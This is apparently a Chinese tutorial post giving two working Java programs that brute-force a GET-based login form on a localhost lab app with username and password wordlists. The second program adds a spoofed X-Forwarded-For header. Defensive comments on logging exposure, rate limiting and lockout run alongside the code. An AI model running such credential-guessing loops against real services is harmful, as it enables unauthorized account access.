java 通过GET请求暴力破解密码

tech2024-07-14  64

一、原理

GET请求会将参数放在URL中。如果登录接口通过GET请求提交,用户名和密码就会出现在URL里一并发送。因此可以构造带有用户名和密码的URL发起登录请求,并根据返回的数据判断登录是否成功,从而实现对口令的枚举(爆破)。从防御角度看,登录接口不应通过GET传递凭据:URL中的口令还会留在服务器访问日志、代理日志和浏览器历史中;同时服务端应对连续失败的登录做限速或锁定。

二、思路

通过socket建立连接,并准备用户名字典和密码字典;用两层for循环(外层遍历用户名,内层遍历密码)依次取出字典中的值构建URL,逐个发送请求并接收返回的数据,据此判断登录结果。(下文两段示例代码为了简化,各只遍历一个字典:第一种固定密码、遍历用户名;第二种固定用户名、遍历密码。)

此时需要注意的是,在发送了请求后,判定登录失败,则需要关闭socket,并重新建立socket进行下一次登录。

三、代码

第一种

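package com.mtlk.hd;

import java.io.*;
import java.net.Socket;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.Scanner;

/**
 * Lab demo: replays a login over a raw-socket HTTP GET against the web app
 * deployed on 127.0.0.1:8080, one request per entry of a local word list.
 *
 * <p>Each instance owns one socket and serves exactly one request;
 * {@link #send(String)} closes that socket whether it returns or throws.
 *
 * <p>Defensive reading: a login endpoint that accepts credentials in the
 * query string exposes them in access and proxy logs, and an endpoint that
 * answers every attempt without throttling or lockout can be enumerated
 * exactly like this. Prefer POST over TLS together with per-account and
 * per-source attempt limits.
 */
public class GetDemo {
    private PrintWriter pw;
    private BufferedReader br;
    private Socket s;

    // Text of the most recent response. The initial "0" makes the first
    // pass of the loop in main() send a request, because that loop only
    // advances when this buffer ends with "0".
    private static StringBuffer responseBody = new StringBuffer("0");

    /**
     * Opens a stream socket to 127.0.0.1:8080 and wraps its streams.
     *
     * @throws IOException if the connection or the stream setup fails
     * @throws InterruptedException declared by the original signature; nothing here throws it
     */
    public GetDemo() throws IOException, InterruptedException {
        s = new Socket("127.0.0.1", 8080);
        try {
            pw = new PrintWriter(s.getOutputStream(), true);
            br = new BufferedReader(new InputStreamReader(s.getInputStream()));
        } catch (IOException e) {
            // Do not leak the connected socket when wrapping its streams fails.
            s.close();
            throw e;
        }
    }

    /**
     * Sends one GET request with {@code name=mes} and the fixed {@code pass=123},
     * echoes the response line by line, and records it in {@code responseBody}.
     *
     * <p>Reading stops at the first response line containing "Error"; in that
     * case a trailing "0" marker is appended so that main() moves on to the
     * next entry.
     *
     * @param mes value placed in the {@code name} query parameter
     * @throws IOException if writing the request or reading the response fails
     * @throws InterruptedException declared by the original signature; nothing here throws it
     */
    private void send(String mes) throws IOException, InterruptedException {
        try {
            System.out.println("---------------------request---------------------------");
            StringBuffer request = new StringBuffer("GET /WebDemo_2_war_exploded/user?name=" + mes + "&pass=123 HTTP/1.1\r\n");
            request.append("HOST:127.0.0.1\r\n");
            // println() appends the platform line separator, which serves as
            // the empty line ending the header block.
            pw.println(request.toString());
            pw.flush();
            System.out.println(request.toString());

            System.out.println("---------------------response---------------------------");
            responseBody = new StringBuffer();
            String str = "";
            while ((str = br.readLine()) != null) {
                responseBody.append(str + "\r\n");
                System.out.println(str);
                if (str.trim().contains("Error")) {
                    responseBody.append("0");
                    break;
                }
            }
        } finally {
            // One socket per request: release it even when the I/O above throws.
            s.close();
        }
    }

    /**
     * Reads the word list and sends one request per entry, waiting for each
     * response before sending the next.
     *
     * @param args unused
     * @throws IOException if the word list cannot be read or a request fails
     * @throws InterruptedException if the sleep between polls is interrupted
     */
    public static void main(String[] args) throws IOException, InterruptedException {
        // Read the whole file in one call. The previous available()/read()
        // pair left the stream open and did not guarantee a full read.
        byte[] content = Files.readAllBytes(Paths.get("E:/字典1/name.txt"));
        // Decoded with the platform default charset, as before.
        String context = new String(content);
        // Split the list into entries on CRLF line endings.
        String[] mess = context.split("\r\n");

        int length = mess.length;
        int index = 0;
        // NOTE(review): the loop advances only while the trimmed responseBody
        // ends with "0". After any other response it just keeps sleeping and
        // never exits.
        while (true) {
            if (responseBody.toString().trim().endsWith("0")) {
                if (index == length) {
                    break;
                }
                String mes = mess[index++];
                new GetDemo().send(mes);
            }
            Thread.sleep(100);
        }
    }
}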

第二种,带HttpClient包

package com.mtlk.hcd;

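import org.apache.http.HttpEntity;
import org.apache.http.client.HttpClient;
import org.apache.http.client.methods.CloseableHttpResponse;
import org.apache.http.client.methods.HttpGet;
import org.apache.http.impl.client.CloseableHttpClient;
import org.apache.http.impl.client.HttpClients;
import org.apache.http.util.EntityUtils;

import java.io.FileInputStream;
import java.io.IOException;
import java.io.InputStream;
import java.util.Scanner;

/**
 * Lab demo using Apache HttpClient: for each line of a local password list,
 * sends a GET login request for the fixed user name {@code admin} to the web
 * app on localhost:8080 and prints the response body.
 *
 * <p>The program does not evaluate the responses; it only prints them.
 *
 * <p>Defensive reading: credentials carried in the query string end up in
 * access and proxy logs, and a login endpoint without attempt throttling or
 * lockout can be enumerated by a loop as simple as this one.
 */
public class GetDemo {
    /**
     * Runs the demo.
     *
     * @param args unused
     * @throws IOException if the word list cannot be read or a request fails
     */
    public static void main(String[] args) throws IOException {
        // try-with-resources closes the word-list stream and the scanner,
        // which were previously never closed.
        try (InputStream is = new FileInputStream("E:/字典1/postman_pass.txt");
             Scanner sc = new Scanner(is)) {
            while (sc.hasNextLine()) {
                String pass = sc.nextLine();

                // Build the GET request for this entry.
                HttpGet httpget = new HttpGet("http://localhost:8080/WebDemo_2_war_exploded/user?name=admin&pass=" + pass);
                // NOTE(review): this header is entirely client-controlled. A server
                // must not treat it as the caller's address for lockout or rate
                // limiting unless it was set by a trusted reverse proxy.
                httpget.setHeader("X-Forwarded-For", "127.0.0.1");

                // A fresh client per request, as in the original. Client and
                // response are now released even when execute() or the body
                // read throws.
                try (CloseableHttpClient httpclient = HttpClients.createDefault();
                     CloseableHttpResponse response = httpclient.execute(httpget)) {
                    HttpEntity entity = response.getEntity();
                    System.out.println(EntityUtils.toString(entity));
                }
            }
        }
    }
}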